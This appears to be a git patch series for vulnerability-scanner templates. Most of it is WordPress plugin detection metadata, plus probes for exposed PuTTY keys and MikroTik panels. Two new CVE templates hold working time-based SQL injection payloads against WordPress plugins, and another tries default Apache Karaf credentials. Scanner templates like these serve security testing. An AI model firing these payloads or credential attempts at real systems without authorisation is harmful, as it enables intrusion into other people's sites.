a/technologies/wordpress/wordpress-woocommerce.yaml b/technologies/wordpress/wordpress-woocommerce.yaml index a8e24deb94..972a563105 100644 --- a/technologies/wordpress/wordpress-woocommerce.yaml +++ b/technologies/wordpress/wordpress-woocommerce.yaml @@ -1,7 +1,7 @@ id: wordpress-woocommerce info: - name: WooCommerce Detection + name: "WooCommerce Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-woosidebars.yaml b/technologies/wordpress/wordpress-woosidebars.yaml index 19741b2620..f0e6d62661 100644 --- a/technologies/wordpress/wordpress-woosidebars.yaml +++ b/technologies/wordpress/wordpress-woosidebars.yaml @@ -1,7 +1,7 @@ id: wordpress-woosidebars info: - name: WooSidebars Detection + name: "WooSidebars Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-wordfence.yaml b/technologies/wordpress/wordpress-wordfence.yaml index 4f22ae37d4..d89bf10ccc 100644 --- a/technologies/wordpress/wordpress-wordfence.yaml +++ b/technologies/wordpress/wordpress-wordfence.yaml @@ -1,7 +1,7 @@ id: wordpress-wordfence info: - name: Wordfence Security – Firewall & Malware Scan Detection + name: "Wordfence Security – Firewall & Malware Scan Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-wordpress-importer.yaml b/technologies/wordpress/wordpress-wordpress-importer.yaml index ef4489a009..6e34ca4f88 100644 --- a/technologies/wordpress/wordpress-wordpress-importer.yaml +++ b/technologies/wordpress/wordpress-wordpress-importer.yaml @@ -1,7 +1,7 @@ id: wordpress-wordpress-importer info: - name: WordPress Importer Detection + name: "WordPress Importer Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-wordpress-seo.yaml b/technologies/wordpress/wordpress-wordpress-seo.yaml index 5c8410aa7d..93855c53ca 100644 --- a/technologies/wordpress/wordpress-wordpress-seo.yaml +++ b/technologies/wordpress/wordpress-wordpress-seo.yaml @@ -1,7 +1,7 @@ id: wordpress-wordpress-seo info: - name: Yoast SEO Detection + name: "Yoast SEO Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-worker.yaml b/technologies/wordpress/wordpress-worker.yaml index 96539b0eca..a9f87490cb 100644 --- a/technologies/wordpress/wordpress-worker.yaml +++ b/technologies/wordpress/wordpress-worker.yaml @@ -1,7 +1,7 @@ id: wordpress-worker info: - name: ManageWP Worker Detection + name: "ManageWP Worker Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-wp-fastest-cache.yaml b/technologies/wordpress/wordpress-wp-fastest-cache.yaml index aa50ef9265..d341a60c47 100644 --- a/technologies/wordpress/wordpress-wp-fastest-cache.yaml +++ b/technologies/wordpress/wordpress-wp-fastest-cache.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-fastest-cache info: - name: WP Fastest Cache Detection + name: "WP Fastest Cache Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-wp-file-manager.yaml b/technologies/wordpress/wordpress-wp-file-manager.yaml index ecac702677..f3e8b0f584 100644 --- a/technologies/wordpress/wordpress-wp-file-manager.yaml +++ b/technologies/wordpress/wordpress-wp-file-manager.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-file-manager info: - name: File Manager Detection + name: "File Manager Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-wp-google-maps.yaml b/technologies/wordpress/wordpress-wp-google-maps.yaml index b174abbf5f..76d1f23ecd 100644 --- a/technologies/wordpress/wordpress-wp-google-maps.yaml +++ b/technologies/wordpress/wordpress-wp-google-maps.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-google-maps info: - name: WP Go Maps (formerly WP Google Maps) Detection + name: "WP Go Maps (formerly WP Google Maps) Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-wp-mail-smtp.yaml b/technologies/wordpress/wordpress-wp-mail-smtp.yaml index 5e33ce2345..3cd983a0c2 100644 --- a/technologies/wordpress/wordpress-wp-mail-smtp.yaml +++ b/technologies/wordpress/wordpress-wp-mail-smtp.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-mail-smtp info: - name: WP Mail SMTP by WPForms – The Most Popular SMTP and Email Log Plugin Detection + name: "WP Mail SMTP by WPForms – The Most Popular SMTP and Email Log Plugin Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-wp-maintenance-mode.yaml b/technologies/wordpress/wordpress-wp-maintenance-mode.yaml index f253ba6191..2f079b6b4d 100644 --- a/technologies/wordpress/wordpress-wp-maintenance-mode.yaml +++ b/technologies/wordpress/wordpress-wp-maintenance-mode.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-maintenance-mode info: - name: LightStart – Maintenance Mode, Coming Soon and Landing Page Builder Detection + name: "LightStart – Maintenance Mode, Coming Soon and Landing Page Builder Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-wp-migrate-db.yaml b/technologies/wordpress/wordpress-wp-migrate-db.yaml index 3cd050abee..550a6ab260 100644 --- a/technologies/wordpress/wordpress-wp-migrate-db.yaml +++ b/technologies/wordpress/wordpress-wp-migrate-db.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-migrate-db info: - name: WP Migrate Lite – WordPress Migration Made Easy Detection + name: "WP Migrate Lite – WordPress Migration Made Easy Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-wp-multibyte-patch.yaml b/technologies/wordpress/wordpress-wp-multibyte-patch.yaml index 01dc69a7c2..94dae30ea3 100644 --- a/technologies/wordpress/wordpress-wp-multibyte-patch.yaml +++ b/technologies/wordpress/wordpress-wp-multibyte-patch.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-multibyte-patch info: - name: WP Multibyte Patch Detection + name: "WP Multibyte Patch Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-wp-optimize.yaml b/technologies/wordpress/wordpress-wp-optimize.yaml index a273a898ed..7ee1d78fa4 100644 --- a/technologies/wordpress/wordpress-wp-optimize.yaml +++ b/technologies/wordpress/wordpress-wp-optimize.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-optimize info: - name: WP-Optimize – Cache, Clean, Compress. Detection + name: "WP-Optimize – Cache, Clean, Compress. Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-wp-pagenavi.yaml b/technologies/wordpress/wordpress-wp-pagenavi.yaml index e8951c9a56..d7b5e63974 100644 --- a/technologies/wordpress/wordpress-wp-pagenavi.yaml +++ b/technologies/wordpress/wordpress-wp-pagenavi.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-pagenavi info: - name: WP-PageNavi Detection + name: "WP-PageNavi Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-wp-reset.yaml b/technologies/wordpress/wordpress-wp-reset.yaml index 741e6da0fd..841d2b1104 100644 --- a/technologies/wordpress/wordpress-wp-reset.yaml +++ b/technologies/wordpress/wordpress-wp-reset.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-reset info: - name: WP Reset – Most Advanced WordPress Reset Tool Detection + name: "WP Reset – Most Advanced WordPress Reset Tool Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-wp-sitemap-page.yaml b/technologies/wordpress/wordpress-wp-sitemap-page.yaml index 32d65af705..91db5b3eaa 100644 --- a/technologies/wordpress/wordpress-wp-sitemap-page.yaml +++ b/technologies/wordpress/wordpress-wp-sitemap-page.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-sitemap-page info: - name: WP Sitemap Page Detection + name: "WP Sitemap Page Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-wp-smushit.yaml b/technologies/wordpress/wordpress-wp-smushit.yaml index 263e2a3b49..a3718d845f 100644 --- a/technologies/wordpress/wordpress-wp-smushit.yaml +++ b/technologies/wordpress/wordpress-wp-smushit.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-smushit info: - name: Smush – Lazy Load Images, Optimize & Compress Images Detection + name: "Smush – Lazy Load Images, Optimize & Compress Images Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-wp-statistics.yaml b/technologies/wordpress/wordpress-wp-statistics.yaml index df7ece5790..eb205f5539 100644 --- a/technologies/wordpress/wordpress-wp-statistics.yaml +++ b/technologies/wordpress/wordpress-wp-statistics.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-statistics info: - name: WP Statistics Detection + name: "WP Statistics Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-wp-super-cache.yaml b/technologies/wordpress/wordpress-wp-super-cache.yaml index e7c311a6cb..e58e09cd4e 100644 --- a/technologies/wordpress/wordpress-wp-super-cache.yaml +++ b/technologies/wordpress/wordpress-wp-super-cache.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-super-cache info: - name: WP Super Cache Detection + name: "WP Super Cache Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-wp-user-avatar.yaml b/technologies/wordpress/wordpress-wp-user-avatar.yaml index 300683e02a..e6e657ed24 100644 --- a/technologies/wordpress/wordpress-wp-user-avatar.yaml +++ b/technologies/wordpress/wordpress-wp-user-avatar.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-user-avatar info: - name: Paid Membership, Ecommerce, User Registration, Login, User Profile & Restrict Content Plugin – ProfilePress Detection + name: "Paid Membership, Ecommerce, User Registration, Login, User Profile & Restrict Content Plugin – ProfilePress Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-wpcf7-recaptcha.yaml b/technologies/wordpress/wordpress-wpcf7-recaptcha.yaml index 49e66b0432..342424568f 100644 --- a/technologies/wordpress/wordpress-wpcf7-recaptcha.yaml +++ b/technologies/wordpress/wordpress-wpcf7-recaptcha.yaml @@ -1,7 +1,7 @@ id: wordpress-wpcf7-recaptcha info: - name: ReCaptcha v2 for Contact Form 7 Detection + name: "ReCaptcha v2 for Contact Form 7 Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-wpcf7-redirect.yaml b/technologies/wordpress/wordpress-wpcf7-redirect.yaml index bc199e77fa..d4c2667d25 100644 --- a/technologies/wordpress/wordpress-wpcf7-redirect.yaml +++ b/technologies/wordpress/wordpress-wpcf7-redirect.yaml @@ -1,7 +1,7 @@ id: wordpress-wpcf7-redirect info: - name: Redirection for Contact Form 7 Detection + name: "Redirection for Contact Form 7 Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-wpforms-lite.yaml b/technologies/wordpress/wordpress-wpforms-lite.yaml index cd018b5513..162e1977a9 100644 --- a/technologies/wordpress/wordpress-wpforms-lite.yaml +++ b/technologies/wordpress/wordpress-wpforms-lite.yaml @@ -1,7 +1,7 @@ id: wordpress-wpforms-lite info: - name: Contact Form by WPForms – Drag & Drop Form Builder for WordPress Detection + name: "Contact Form by WPForms – Drag & Drop Form Builder for WordPress Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-wps-hide-login.yaml b/technologies/wordpress/wordpress-wps-hide-login.yaml index ae60d5ddf3..5e5827595e 100644 --- a/technologies/wordpress/wordpress-wps-hide-login.yaml +++ b/technologies/wordpress/wordpress-wps-hide-login.yaml @@ -1,7 +1,7 @@ id: wordpress-wps-hide-login info: - name: WPS Hide Login Detection + name: "WPS Hide Login Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-yith-woocommerce-compare.yaml b/technologies/wordpress/wordpress-yith-woocommerce-compare.yaml index 1c907cfa93..bc98d8e7a7 100644 --- a/technologies/wordpress/wordpress-yith-woocommerce-compare.yaml +++ b/technologies/wordpress/wordpress-yith-woocommerce-compare.yaml @@ -1,7 +1,7 @@ id: wordpress-yith-woocommerce-compare info: - name: YITH WooCommerce Compare Detection + name: "YITH WooCommerce Compare Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-yith-woocommerce-wishlist.yaml b/technologies/wordpress/wordpress-yith-woocommerce-wishlist.yaml index b0554eb019..d5734751d0 100644 --- a/technologies/wordpress/wordpress-yith-woocommerce-wishlist.yaml +++ b/technologies/wordpress/wordpress-yith-woocommerce-wishlist.yaml @@ -1,7 +1,7 @@ id: wordpress-yith-woocommerce-wishlist info: - name: YITH WooCommerce Wishlist Detection + name: "YITH WooCommerce Wishlist Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET From e09bb5d47892b92e44fb6916c6959fc31a0d95e9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 2 Dec 2022 12:50:22 +0530 Subject: [PATCH 0053/1133] Update putty-private-key-disclosure.yaml --- exposures/files/putty-private-key-disclosure.yaml | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/exposures/files/putty-private-key-disclosure.yaml b/exposures/files/putty-private-key-disclosure.yaml index f9b43ced3e..bf37cb013a 100644 --- a/exposures/files/putty-private-key-disclosure.yaml +++ b/exposures/files/putty-private-key-disclosure.yaml @@ -2,16 +2,26 @@ id: putty-private-key-disclosure info: name: Putty Private Key Disclosure - author: dhiyaneshDk + author: DhiyaneshDk,geeknik severity: medium reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/putty-private-key-disclosure.json + metadata: + verified: true + github-query: filename:putty.ppk tags: exposure,files requests: - method: GET path: - "{{BaseURL}}/my.ppk" + - "{{BaseURL}}/putty.ppk" + - "{{BaseURL}}/{{Hostname}}.ppk" + - "{{BaseURL}}/.ssh/putty.ppk" + - "{{BaseURL}}/.ssh/{{Hostname}}.ppk" + - "{{BaseURL}}/.putty/my.ppk" + - "{{BaseURL}}/.putty/putty.ppk" + - "{{BaseURL}}/.putty/{{Hostname}}.ppk" matchers-condition: and matchers: From 0e603358f53daf1aa974fc53f0328dc03a98ff70 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 2 Dec 2022 12:51:21 +0530 Subject: [PATCH 0054/1133] Update putty-private-key-disclosure.yaml --- exposures/files/putty-private-key-disclosure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/files/putty-private-key-disclosure.yaml b/exposures/files/putty-private-key-disclosure.yaml index bf37cb013a..2f724217a0 100644 --- a/exposures/files/putty-private-key-disclosure.yaml +++ b/exposures/files/putty-private-key-disclosure.yaml @@ -23,6 +23,7 @@ requests: - "{{BaseURL}}/.putty/putty.ppk" - "{{BaseURL}}/.putty/{{Hostname}}.ppk" + stop-at-first-match: true matchers-condition: and matchers: - type: word From 043f338ad37b3faa28bdfe2efdd92641e860f536 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 2 Dec 2022 15:59:41 +0530 Subject: [PATCH 0055/1133] Update mikrotik-routeros.yaml --- exposed-panels/mikrotik-routeros.yaml | 34 ++++----------------------- 1 file changed, 4 insertions(+), 30 deletions(-) diff --git a/exposed-panels/mikrotik-routeros.yaml b/exposed-panels/mikrotik-routeros.yaml index 51253f69dc..3aa007737e 100644 --- a/exposed-panels/mikrotik-routeros.yaml +++ b/exposed-panels/mikrotik-routeros.yaml @@ -8,7 +8,8 @@ info: - https://systemweakness.com/routeros-user-with-just-ftp-policy-can-write-to-filesystem-cve-2021-27221-e3e45d780dfe metadata: verified: true - tags: panel,login + shodan-query: title:"RouterOS router configuration page" + tags: panel,login,mikrotik requests: - method: GET @@ -18,7 +19,7 @@ requests: - '{{BaseURL}}/graphs/' stop-at-first-match: true - matchers-condition: or + matchers-condition: and matchers: - type: word name: router @@ -28,35 +29,8 @@ requests: - '<title>RouterOS router configuration page' condition: and - - type: word - name: router-old - part: body - words: - - 'mikrotik routeros > administration' - - 'Mikrotik Router' - - '<img src="/webcfg/' - - '<title>MikroTik RouterOS Managing Webpage' - condition: or - - - type: word - name: hotspot - part: body - words: - - 'Please log on to use the mikrotik hotspot service' - - 'mikrotik hotspot > login' - condition: and - - - type: word - name: mikrotik-httpproxy - part: header - words: - - "Server: mikrotik httpproxy" - extractors: - type: regex group: 1 regex: - - "

RouterOS (.+)

" - - '
mikrotik routeros (.[0-9.]+) configuration page
' - - 'routeros (.[0-9.]+) ' - - 'MikroTik RouterOS (.[0-9.]+)' + - '

RouterOS (.+)

' From 02e41d6cad0dad977fdf48b14965096e9fc56951 Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Fri, 2 Dec 2022 16:09:14 +0530 Subject: [PATCH 0056/1133] Added template for CVE-2022-0826 --- cves/2022/CVE-2022-0826.yaml | 42 ++++++++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 cves/2022/CVE-2022-0826.yaml diff --git a/cves/2022/CVE-2022-0826.yaml b/cves/2022/CVE-2022-0826.yaml new file mode 100644 index 0000000000..c5b96634bd --- /dev/null +++ b/cves/2022/CVE-2022-0826.yaml @@ -0,0 +1,42 @@ +id: CVE-2022-0826 + +info: + name: WP Video Gallery <= 1.7.1 - Unauthenticated SQLi + author: theamanrawat + severity: critical + description: | + The WP Video Gallery WordPress plugin through 1.7.1 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users. + reference: + - https://wpscan.com/vulnerability/7a3eed3b-c643-4e24-b833-eba60ab631c5 + - https://wordpress.org/plugins/wp-video-gallery-free/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-0826 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-0826 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-video-gallery-free,unauth + +requests: + - raw: + - | + @timeout: 15s + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: 192.168.0.100:8888 + User-Agent: curl/7.79.1 + Accept: */* + Content-Length: 132 + Content-Type: application/x-www-form-urlencoded + Connection: close + + action=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523 + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - '(contains(body, "Registred videos :") || contains(body, "duplicate"))' + condition: and \ No newline at end of file From c9e12d4811bd49c21ee3e0a6a02fb432fd845d7d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Dec 2022 17:17:00 +0530 Subject: [PATCH 0057/1133] Create mikrotik-httpproxy.yaml --- technologies/mikrotik-httpproxy.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 technologies/mikrotik-httpproxy.yaml diff --git a/technologies/mikrotik-httpproxy.yaml b/technologies/mikrotik-httpproxy.yaml new file mode 100644 index 0000000000..74862b3847 --- /dev/null +++ b/technologies/mikrotik-httpproxy.yaml @@ -0,0 +1,23 @@ +id: mikrotik-httpproxy + +info: + name: MikroTik httpproxy + author: its0x08,DhiyaneshDk + severity: info + metadata: + verified: true + shodan-query: 'Server: mikrotik httpproxy' + tags: tech,mikrotik + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Server: Mikrotik HttpProxy' + case-insensitive: true From 38c82ac62266a8f1cf478883c016e9337d228913 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Dec 2022 17:50:19 +0530 Subject: [PATCH 0058/1133] Rename exposed-panels/mikrotik-routeros.yaml to exposed-panels/mikrotik/mikrotik-routeros.yaml --- exposed-panels/{ => mikrotik}/mikrotik-routeros.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename exposed-panels/{ => mikrotik}/mikrotik-routeros.yaml (100%) diff --git a/exposed-panels/mikrotik-routeros.yaml b/exposed-panels/mikrotik/mikrotik-routeros.yaml similarity index 100% rename from exposed-panels/mikrotik-routeros.yaml rename to exposed-panels/mikrotik/mikrotik-routeros.yaml From 98faf639d8a5ef1dcb9007d73df9bafc180f7dcc Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sat, 3 Dec 2022 09:58:26 +0100 Subject: [PATCH 0059/1133] Update pega-web-panel.yaml --- exposed-panels/pega-web-panel.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposed-panels/pega-web-panel.yaml b/exposed-panels/pega-web-panel.yaml index 09397816e7..8a34f22be9 100644 --- a/exposed-panels/pega-web-panel.yaml +++ b/exposed-panels/pega-web-panel.yaml @@ -2,7 +2,7 @@ id: pega-web-panel info: name: Pega Infinity Web Login Panel - author: powerexploit + author: powerexploit,righettod severity: info description: | Pega Infinity is CRM solution with robotic automation that is fully baked in.Which supports no code platform with robotic automation @@ -18,6 +18,7 @@ requests: - method: GET path: - "{{BaseURL}}/prweb/PRAuth/app/default/" + - "{{BaseURL}}/prweb" host-redirects: true max-redirects: 2 From f0f87d7c9f009f3de397217bbd3d92362e477475 Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Sat, 3 Dec 2022 16:34:00 +0530 Subject: [PATCH 0060/1133] Added template for CVE-2022-0948 --- cves/2022/CVE-2022-0948.yaml | 44 ++++++++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 cves/2022/CVE-2022-0948.yaml diff --git a/cves/2022/CVE-2022-0948.yaml b/cves/2022/CVE-2022-0948.yaml new file mode 100644 index 0000000000..a5199a57ff --- /dev/null +++ b/cves/2022/CVE-2022-0948.yaml @@ -0,0 +1,44 @@ +id: CVE-2022-0948 + +info: + name: Order Listener for WooCommerce < 3.2.2 - Unauthenticated SQLi + author: theamanrawat + severity: critical + description: | + The Order Listener for WooCommerce WordPress plugin before 3.2.2 does not sanitise and escape the id parameter before using it in a SQL statement via a REST route available to unauthenticated users, leading to an SQL injection. + reference: + - https://wpscan.com/vulnerability/daad48df-6a25-493f-9d1d-17b897462576 + - https://wordpress.org/plugins/woc-order-alert/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-0948 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-0948 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,woc-order-alert,unauth + +requests: + - raw: + - | + GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1 + Host: {{Hostname}} + + - | + @timeout: 15s + POST /?rest_route=/olistener/new HTTP/1.1 + Host: {{Hostname}} + content-type: application/json + + {"id":" (SLEEP(6))#"} + + req-condition: true + matchers: + - type: dsl + dsl: + - 'duration_2>=6' + - 'status_code_2 == 200' + - 'contains(content_type_2, "application/json")' + - 'contains(body_1, "olistener-action.olistener-controller")' + condition: and \ No newline at end of file From 10159089acbe39f52233ab013306a695e07e247a Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Sat, 3 Dec 2022 16:37:30 +0530 Subject: [PATCH 0061/1133] Updated --- cves/2022/CVE-2022-0826.yaml | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/cves/2022/CVE-2022-0826.yaml b/cves/2022/CVE-2022-0826.yaml index c5b96634bd..15f724ac96 100644 --- a/cves/2022/CVE-2022-0826.yaml +++ b/cves/2022/CVE-2022-0826.yaml @@ -24,12 +24,8 @@ requests: - | @timeout: 15s POST /wp-admin/admin-ajax.php HTTP/1.1 - Host: 192.168.0.100:8888 - User-Agent: curl/7.79.1 - Accept: */* - Content-Length: 132 + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Connection: close action=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523 matchers: From 3ad8586df6726b80df8a0e35b9b54b0dc9788892 Mon Sep 17 00:00:00 2001 From: Thibault Soubiran Date: Sat, 3 Dec 2022 22:53:49 +0100 Subject: [PATCH 0062/1133] Add Apache Karaf templates --- .../apache/karaf-default-login.yaml | 38 +++++++++++++++++++ exposed-panels/apache/apache-karaf-panel.yaml | 26 +++++++++++++ 2 files changed, 64 insertions(+) create mode 100644 default-logins/apache/karaf-default-login.yaml create mode 100644 exposed-panels/apache/apache-karaf-panel.yaml diff --git a/default-logins/apache/karaf-default-login.yaml b/default-logins/apache/karaf-default-login.yaml new file mode 100644 index 0000000000..c8d2212aba --- /dev/null +++ b/default-logins/apache/karaf-default-login.yaml @@ -0,0 +1,38 @@ +id: karaf-default-login + +info: + name: Apache Karaf Default Login + author: s0obi + severity: high + description: Apache Karaf default login credentials were discovered. + reference: + - https://karaf.apache.org/manual/latest/webconsole + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cwe-id: CWE-1392 + remediation: Change default karaf password for a stronger one. + tags: apache,default-login,karaf + +requests: + - raw: + - | + GET /system/console HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64('karaf:karaf')}} + + redirects: true + max-redirects: 1 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Apache Karaf Web Console" + - "http://karaf.apache.org" + condition: and + + - type: status + status: + - 200 diff --git a/exposed-panels/apache/apache-karaf-panel.yaml b/exposed-panels/apache/apache-karaf-panel.yaml new file mode 100644 index 0000000000..9bdffb4115 --- /dev/null +++ b/exposed-panels/apache/apache-karaf-panel.yaml @@ -0,0 +1,26 @@ +id: apache-karaf-panel + +info: + name: Apache Karaf Login Panel + author: s0obi + severity: info + description: An Apache Karaf login panel was detected. + classification: + cwe-id: CWE-200 + tags: apache,karaf,panel + +requests: + - method: GET + path: + - "{{BaseURL}}:8181/system/console" + + matchers-condition: and + matchers: + - type: word + words: + - "Basic realm=\"karaf\"" + 